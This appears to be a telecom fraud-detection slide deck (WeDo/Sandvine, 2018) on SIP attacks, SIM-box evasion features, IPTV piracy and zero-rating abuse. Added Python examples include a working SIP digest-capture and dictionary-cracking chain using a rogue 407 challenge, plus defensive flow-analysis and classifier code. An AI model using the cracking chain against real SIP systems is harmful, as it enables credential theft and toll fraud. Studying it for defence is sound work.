PEDRO FIDALGO, WEDO TECHNOLOGIES
DAN DEETH, SANDVINE

Posted on 22-Aug-2018

• FRAUD OVER IP
• KNOW YOUR ENEMY
• SIP FRAUD CHALLENGES
• IPTV FRAUD
• ZERO RATED FRAUD
• ADVANCED FRAUD DETECTION IN IP

• MIGRATION FROM CIRCUIT-SWITCHED TO IP NETWORKS, SIP, LTE
• FRAUD DETECTION AND INTRUSION DETECTION HAVE TRADITIONALLY BEEN COMPLETELY SEPARATE RESEARCH AREAS
• MALICIOUS ACTIVITY + POLICY VIOLATIONS + ARTIFICIAL INTELLIGENCE

• Back in 2011, an attacker (or group of attackers) performed an Internet-wide scanning event that was orchestrated by a botnet.
• The probe was a SIP REGISTER request trying to register a dummy user and expecting to receive a 404 Not Found client-failure response.
• In less than 12 days they were able to query 4,000,000,000 IP addresses, which equated to practically every IPv4 address on the Internet.

ANTI-FRAUD DETECTION READY (features advertised for SIM box / GSM gateway equipment)

STEALTH CAPABILITIES

• Port Inter-Calling
• Fake Ring-Back
• Proxy Encryption for IP Block
• Dynamic Allocation and Rotation of SIM Cards
• IMEI Change
• Internet Data Simulation
• BTS Change and Lock
• Carrier Selection
• SIM Bank / SIM Server

ANTI BLOCKING

• Accumulated Duration and Calls
• Consecutive Failed, No Answer, Short Duration Calls

FEATURES

• Up to 128 Channels
• GSM/CDMA/WCDMA/LTE Frequencies
• GoIP (SIP and H.323)
• Automatic Recharge

SECURITY

• End-to-end encryption is not ensured, since intermediate SIP servers need to examine and change certain fields of the SIP messages.
• The protection that is available only covers a few SIP fields and leaves other important SIP fields (e.g., SDP, From, To) unprotected.
• SIP messages between the SIP server and the UA are in clear text when carried over plain UDP/TCP rather than TLS, and so are vulnerable to MITM.
• User agents are required to authenticate to SIP servers, but SIP servers are not required to authenticate to user agents.
• User agents can be challenged to respond with their credentials. The response carries an MD5 digest of the password (HTTP digest authentication as used by SIP), which can be brute-forced offline.

SIP VICIOUS

• Port scan for the SIP port - UDP 5060
• Send a SIP INVITE message (ghost call) and hang up
• Respond with a 407 Proxy Authentication Required message to the BYE sent by the user agent
• The user agent responds with an MD5 digest of its password (Proxy-Authorization header)
• Brute force the MD5 digest to recover the password
• Authenticate using the compromised credentials
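The two sections above describe the weakness (the server never authenticates to the user agent, and the credential proof is an MD5 digest) and the chain that exploits it. The following added example, which is not code from the slides or from SIPVicious, replays that chain in Python: a rogue 407 challenge with an attacker-chosen nonce, the UA's Proxy-Authorization answer, and the offline dictionary attack on the captured digest. The extension, realm, nonce, request URI and wordlist are constructed; the digest math is the MD5 scheme of RFC 2617 as used by RFC 3261, without qop.

```python
"""SIP digest authentication as abused by the ghost-call / rogue-407 chain.

Added example, not code from the WeDo/Sandvine slides or from SIPVicious. The
extension, realm, nonce, request URI and wordlist are constructed; the digest is
the MD5 scheme SIP inherits from HTTP digest (RFC 2617 via RFC 3261), no qop.
"""
from __future__ import annotations

import hashlib
import re
from typing import Optional

# Constructed victim and attacker values (not from the slides).
UA_USER = "1001"
REALM = "sip.example.invalid"
SECRET = "1234"                    # PIN-style extension password the wordlist will recover
ROGUE_NONCE = "0a1b2c3d4e5f6a7b"   # attacker-chosen: every victim hashes the same nonce
BYE_URI = "sip:1001@192.0.2.10"
WORDLIST = ["0000", "1111", "password", "1234", "123456"]


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(username: str, realm: str, password: str,
                    method: str, uri: str, nonce: str) -> str:
    """RFC 2617 digest without qop: MD5(HA1 ':' nonce ':' HA2).
    The password enters only through HA1; username, realm, nonce, method and URI
    all travel in clear, so a captured response can be tested against guesses offline."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def parse_digest_params(header_line: str) -> dict[str, str]:
    """Extract key=value pairs (quoted or bare) from a Digest header line."""
    _, _, params = header_line.partition("Digest")
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in re.finditer(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', params)}


def rogue_challenge(realm: str, nonce: str) -> str:
    """The attacker's answer to the UA's BYE: a 407 with a nonce of its choosing."""
    return ("SIP/2.0 407 Proxy Authentication Required\r\n"
            f'Proxy-Authenticate: Digest realm="{realm}", nonce="{nonce}", algorithm=MD5\r\n')


def ua_answer_challenge(challenge: str, username: str, password: str,
                        method: str, uri: str) -> str:
    """What a UA does on a 407: take realm and nonce from whoever challenged it
    (no server authentication happens here) and re-send with credentials."""
    auth_line = next(line for line in challenge.split("\r\n")
                     if line.startswith("Proxy-Authenticate:"))
    chal = parse_digest_params(auth_line)
    response = digest_response(username, chal["realm"], password, method, uri, chal["nonce"])
    return (f'Proxy-Authorization: Digest username="{username}", realm="{chal["realm"]}", '
            f'nonce="{chal["nonce"]}", uri="{uri}", response="{response}", algorithm=MD5')


def crack_digest(auth_header: str, method: str, wordlist: list[str]) -> Optional[str]:
    """Offline dictionary attack on a captured Proxy-Authorization header.
    Returns the password that reproduces the response, or None on a miss."""
    p = parse_digest_params(auth_header)
    for candidate in wordlist:
        if digest_response(p["username"], p["realm"], candidate,
                           method, p["uri"], p["nonce"]) == p["response"]:
            return candidate
    return None


def simulate_exchange() -> str:
    """Replays the chain on the slide and returns the header the attacker captures:
    attacker -> UA  INVITE (phone rings: the ghost call)
    UA -> attacker  BYE (user hangs up)
    attacker -> UA  407 Proxy Authentication Required
    UA -> attacker  BYE again, now with Proxy-Authorization"""
    challenge = rogue_challenge(REALM, ROGUE_NONCE)
    return ua_answer_challenge(challenge, UA_USER, SECRET, "BYE", BYE_URI)


if __name__ == "__main__":
    captured = simulate_exchange()
    print(captured)
    print("cracked password:", crack_digest(captured, "BYE", WORDLIST))
```

Nothing in the exchange binds the challenge to a legitimate proxy: any host that answers a BYE with a 407 receives a hash of the password under a nonce it picked itself, and a four-digit extension PIN falls to a wordlist instantly. Verified SIP over TLS (so the UA knows who challenged it) and non-dictionary passwords are what stop this chain.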

1. Sandvine creates a data record for the selected SIP messages and transmits it to WeDo.

2. WeDo analyzes the data record with the RAID FMS and correlates the event with historical records and subscriber information, e.g. customer type and account credit.

3. If WeDo determines that fraud is occurring, it uses the RAID Integrated Case Management automated workflow to drive the CSP through the appropriate next steps.

1. An unlicensed video provider sells thousands of premium channels on plans from 1 day to 1 year. The service can include IPTV boxes already configured.

2. The user subscribes to the illegal IPTV service, or downloads piracy apps to find links to premium video streams.

3. The user receives the content through streaming URLs served from a cloud storage site.

The digital service provider receives $0 revenue and absorbs the cost of the increased capacity. Streaming runs 24/7 if the IPTV boxes are not turned off.

8% TV piracy users in the U.S. and Canada: ~9 million users. With a 4000 kbps stream, each user will consume 1.1 TB a month; $1.1 billion a year.

1. Data records are created identifying users with streaming flows as well as the content providers.

2. RAID FMS creates alarms identifying the users streaming illegal services as well as the use of anonymizers to masquerade the traffic.

3. RAID FMS integrates all alarms, helping CSPs to identify and quantify the total amount involved in fraud as well as the ones creating the highest impact in terms of capacity.

78.5 billion visits in 2015 to worldwide TV and film piracy sites, 73.7% streaming vs 17.3% direct-download sites (MUSO 2015).
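The data records described above (users with streaming flows, content providers) are enough to quantify what the slide calls the capacity impact. The following added example, not code from the slides or from RAID FMS, does that over constructed one-day flow records: it projects the monthly volume of a 4000 kbps stream (about 1.3 TB for 30 days nonstop, against the 1.1 TB the slide quotes), ranks unlicensed providers by octets carried, and finds subscribers whose unlicensed streaming covers almost the whole day, i.e. boxes that are never switched off. The provider deny-list, subscriber IDs and records are constructed.

```python
"""IPTV piracy seen from flow records: projected volume, capacity by provider,
and boxes that stream around the clock.

Added example, not code from the WeDo/Sandvine slides or from RAID FMS. The
unlicensed provider list, subscriber IDs and flow records are constructed.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass

BITS_PER_KBPS = 1_000
SECONDS_PER_MONTH = 30 * 24 * 3600

# Constructed deny-list: hosts a content-identification feed has tagged as unlicensed IPTV.
UNLICENSED = {"cdn.pirate-tv.example", "vod.storage.example"}


@dataclass
class StreamFlow:
    """One streaming flow as a data record might describe it (constructed schema)."""
    subscriber: str
    provider: str   # host the stream was fetched from
    start: int      # seconds since midnight
    end: int
    octets: int


def monthly_octets(kbps: float) -> float:
    """Bytes moved by a stream of the given rate running 24/7 for a 30-day month.
    4000 kbps comes to about 1.3 TB; the slide quotes 1.1 TB for the same stream."""
    return kbps * BITS_PER_KBPS / 8 * SECONDS_PER_MONTH


def capacity_by_provider(flows: list[StreamFlow]) -> list[tuple[str, int]]:
    """Octets carried per unlicensed provider, largest first: the providers
    creating the highest impact in terms of capacity."""
    octets: dict[str, int] = defaultdict(int)
    for f in flows:
        if f.provider in UNLICENSED:
            octets[f.provider] += f.octets
    return sorted(octets.items(), key=lambda kv: kv[1], reverse=True)


def streaming_seconds(flows: list[StreamFlow]) -> dict[str, int]:
    """Seconds per subscriber spent on unlicensed streams, with overlapping
    flows merged so two parallel streams do not count as 48 hours in a day."""
    spans: dict[str, list[tuple[int, int]]] = defaultdict(list)
    for f in flows:
        if f.provider in UNLICENSED:
            spans[f.subscriber].append((f.start, f.end))
    covered: dict[str, int] = {}
    for sub, intervals in spans.items():
        intervals.sort()
        total = 0
        cur_start, cur_end = intervals[0]
        for start, end in intervals[1:]:
            if start <= cur_end:             # overlaps or touches: extend
                cur_end = max(cur_end, end)
            else:                            # gap: close the current interval
                total += cur_end - cur_start
                cur_start, cur_end = start, end
        covered[sub] = total + (cur_end - cur_start)
    return covered


def always_on(flows: list[StreamFlow], min_hours: float = 20) -> set[str]:
    """Subscribers whose unlicensed streaming covers at least min_hours of the
    day: the 'box never turned off' pattern the slide warns about."""
    return {sub for sub, secs in streaming_seconds(flows).items()
            if secs >= min_hours * 3600}


# Constructed one-day records. 4000 kbps for 12 h is 21.6e9 bytes.
FLOWS = [
    StreamFlow("sub-1", "cdn.pirate-tv.example", 0, 43_200, 21_600_000_000),
    StreamFlow("sub-1", "cdn.pirate-tv.example", 43_200, 86_400, 21_600_000_000),
    StreamFlow("sub-2", "vod.storage.example", 72_000, 82_800, 5_400_000_000),
    StreamFlow("sub-2", "vod.storage.example", 75_600, 79_200, 1_000_000_000),  # overlaps the one above
    StreamFlow("sub-3", "video.licensed.example", 64_800, 72_000, 3_600_000_000),
]

if __name__ == "__main__":
    print(f"4000 kbps, 24/7, 30 days: {monthly_octets(4000) / 1e12:.2f} TB")
    print("capacity by provider:", capacity_by_provider(FLOWS))
    print("always-on boxes:", always_on(FLOWS))
```

The interval merge matters in practice: a box that keeps two channels open (main and picture-in-picture) would otherwise appear to stream 48 hours a day, and a threshold on summed flow durations would then over-report always-on devices.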

Zero-rating content is part of many CSPs' offers; it allows unlimited data to specific apps, services or websites.

The VPN-like apps used to abuse it are available in the official store and advertise themselves as tools to "surf the internet privately and securely".

Fraudsters use techniques such as HTTP header injection, domain fronting and DNS spoofing to disguise data traffic so that it looks like the free data offer.


Currently there are 283 VPN-like apps in the Google Play store.

1. Traffic classification, using deterministic or signature techniques, is used to identify connections to Psiphon servers. A data record is transmitted to WeDo.

2. RAID FMS crosses the events with historical and behavioral norms, providing additional context to the event.

3. CSPs using the inherent capabilities of Advanced Case Management will be able to determine the most effective actions to reduce the fraud impact.

Alarms can be grouped into multiple categories, providing the CSPs a holistic view of the fraud impact and the most employed techniques.

Subscribers exploiting the zero-rating of a subscriber portal consumed 300% more than the average user, impacting,
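The three disguises named in this section (HTTP header injection, domain fronting, DNS spoofing) all defeat a classifier that trusts the name in the request, and the 300% figure is the behavioral signature left behind. The following added example, not code from the slides or from WeDo/Sandvine products, puts a name-only zero-rating decision next to one that also requires the destination address to belong to the sponsor's known ranges, then applies a behavioral-norm check over each subscriber's zero-rated volume. The sponsor name, its address ranges and the flow records are constructed.

```python
"""Zero-rating classification: a name-only decision next to a hardened one,
plus the behavioral-norm check that catches what classification cannot.

Added example, not code from the WeDo/Sandvine slides or from RAID FMS.
The sponsor name, its address ranges and the flow records are constructed.
"""
from __future__ import annotations

import ipaddress
import statistics
from dataclasses import dataclass
from typing import Optional

# Constructed sponsor: the zero-rated service and the ranges the CSP knows it is served from.
ZERO_RATED = {
    "video.zero-rated.example": [ipaddress.ip_network("198.51.100.0/24")],
}


@dataclass
class Flow:
    """One flow as a traffic classifier might report it (constructed schema)."""
    subscriber: str
    dst_ip: str
    dst_port: int
    sni: Optional[str]   # TLS Server Name Indication, when the flow is TLS
    host: Optional[str]  # HTTP Host header, only visible on plaintext HTTP
    octets: int


def classify_weak(flow: Flow) -> bool:
    """Zero-rates on the name alone. A tunnelling app that sends a forged Host
    header to its own proxy, or spoofs DNS so the sponsor's name resolves to
    its server, gets its whole tunnel for free."""
    return (flow.sni or flow.host) in ZERO_RATED


def classify_hardened(flow: Flow) -> tuple[bool, str]:
    """Zero-rate only when the name and the destination address agree."""
    name = flow.sni if flow.sni is not None else flow.host
    if name not in ZERO_RATED:
        return False, "not a zero-rated name"
    dst = ipaddress.ip_address(flow.dst_ip)
    if not any(dst in net for net in ZERO_RATED[name]):
        # The packets never reach the sponsor, so the CSP must not sponsor them:
        # this is header injection or a spoofed DNS answer.
        return False, "destination outside sponsor ranges"
    # Domain fronting (sponsor's name in the SNI, another site named inside the
    # encrypted request to the same CDN) passes both checks; only volume
    # behavior can separate it from genuine use.
    return True, "ok"


def zero_rated_volume(flows: list[Flow], accept) -> dict[str, int]:
    """Octets each subscriber had zero-rated under the given classifier."""
    volume: dict[str, int] = {}
    for f in flows:
        volume.setdefault(f.subscriber, 0)
        if accept(f):
            volume[f.subscriber] += f.octets
    return volume


def flag_outliers(volume: dict[str, int], factor: float = 4.0) -> set[str]:
    """Subscribers whose zero-rated volume exceeds factor x the norm. The norm is
    the median rather than the mean so the abusers do not raise it themselves;
    factor 4 corresponds to '300% more than the average user'."""
    norm = statistics.median(volume.values())
    return {sub for sub, v in volume.items() if norm > 0 and v > factor * norm}


# Constructed flows: three genuine viewers, two tunnels disguised as the sponsor, one unrelated.
FLOWS = [
    Flow("sub-A", "198.51.100.20", 443, "video.zero-rated.example", None, 900_000_000),
    Flow("sub-E", "198.51.100.21", 443, "video.zero-rated.example", None, 800_000_000),
    Flow("sub-F", "198.51.100.22", 443, "video.zero-rated.example", None, 1_000_000_000),
    # plaintext HTTP to a tunnel server, Host header forged to the sponsor's name
    Flow("sub-B", "203.0.113.5", 80, None, "video.zero-rated.example", 9_000_000_000),
    # TLS with the sponsor's name in the SNI, but DNS spoofed to the tunnel server
    Flow("sub-C", "203.0.113.9", 443, "video.zero-rated.example", None, 8_000_000_000),
    Flow("sub-D", "192.0.2.50", 443, "news.example", None, 50_000_000),
]

if __name__ == "__main__":
    for f in FLOWS:
        print(f.subscriber, "weak:", classify_weak(f), "hardened:", classify_hardened(f))
    print("outliers under weak classifier:",
          flag_outliers(zero_rated_volume(FLOWS, classify_weak)))
```

The address check closes header injection and DNS spoofing because the tunnel server is not inside the sponsor's ranges; domain fronting to the sponsor's own CDN is indistinguishable at the packet level, which is why the behavioral-norm step remains necessary even with the hardened classifier in place.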

“THANK YOU”

WORLDWIDE LEADERSHIP IN REVENUE ASSURANCE AND FRAUD MANAGEMENT SOFTWARE